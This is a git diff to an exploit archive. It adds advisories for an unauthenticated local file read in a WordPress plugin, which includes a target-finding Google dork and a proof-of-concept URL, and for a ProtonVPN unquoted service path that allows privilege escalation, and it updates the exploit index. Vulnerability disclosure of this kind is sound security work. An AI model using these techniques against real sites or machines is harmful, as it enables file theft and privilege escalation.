diff --git a/exploits/multiple/remote/50833.txt b/exploits/multiple/remote/50833.txt index b8cf77472..92ce3fd7f 100644 --- a/exploits/multiple/remote/50833.txt +++ b/exploits/multiple/remote/50833.txt @@ -4,7 +4,7 @@ # Vendor Homepage: https://www.ivanti.com/ # Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 # Version: CSA 4.6 4.5 - EOF Aug 2021 -# Tested on: Linux x86_64 # CVE : CVE-2021-44529 +# Tested on: Linux x86_64 # CVE : CVE-2021-44529 ### diff --git a/exploits/php/webapps/50838.txt b/exploits/php/webapps/50838.txt new file mode 100644 index 000000000..a5be58a4a --- /dev/null +++ b/exploits/php/webapps/50838.txt @@ -0,0 +1,27 @@ +# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated +# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/ +# Date: 23-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/ +# Version: 3.7.3 +# Tested on: Firefox + +# Vulnerable File: dispatcher.php + +# Vulnerable Code: + +``` +if ( isset($_GET['open']) ) { + include(ABSPATH . 'wp-content/plugins/'.$_GET['open']); +} else { + echo ' +
+
'; + + include_once( ABSPATH . WPINC . '/feed.php' ); +``` + +# Proof of Concept: + +localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI] \ No newline at end of file diff --git a/exploits/windows/local/50837.txt b/exploits/windows/local/50837.txt new file mode 100644 index 000000000..18682d6f3 --- /dev/null +++ b/exploits/windows/local/50837.txt @@ -0,0 +1,29 @@ +# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path +# Date: 22/03/2022 +# Exploit Author: gemreda (@gemredax) +# Vendor Homepage: https://protonvpn.com/ +# Software Link: https://protonvpn.com/ +# Version: 1.26.0 +# Tested: Windows 10 x64 +# Contact: gemredax@pm.me + +PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ProtonVPN Wireguard + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ProtonVPN WireGuard + DEPENDENCIES : Nsi + : TcpIp + SERVICE_START_NAME : LocalSystem + + +#Exploit: + +The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path. +If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8b7a61436..8b9b8a9aa 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11473,6 +11473,7 @@ id,file,description,date,author,type,platform,port 50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows, 50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows, 50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows, +50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44904,3 +44905,4 @@ id,file,description,date,author,type,platform,port 50831,exploits/php/webapps/50831.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover",1970-01-01,"Devansh Bordia",webapps,php, 50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php, 50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php, +50838,exploits/php/webapps/50838.txt,"WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated",1970-01-01,"Hassan Khan Yusufzai",webapps,php,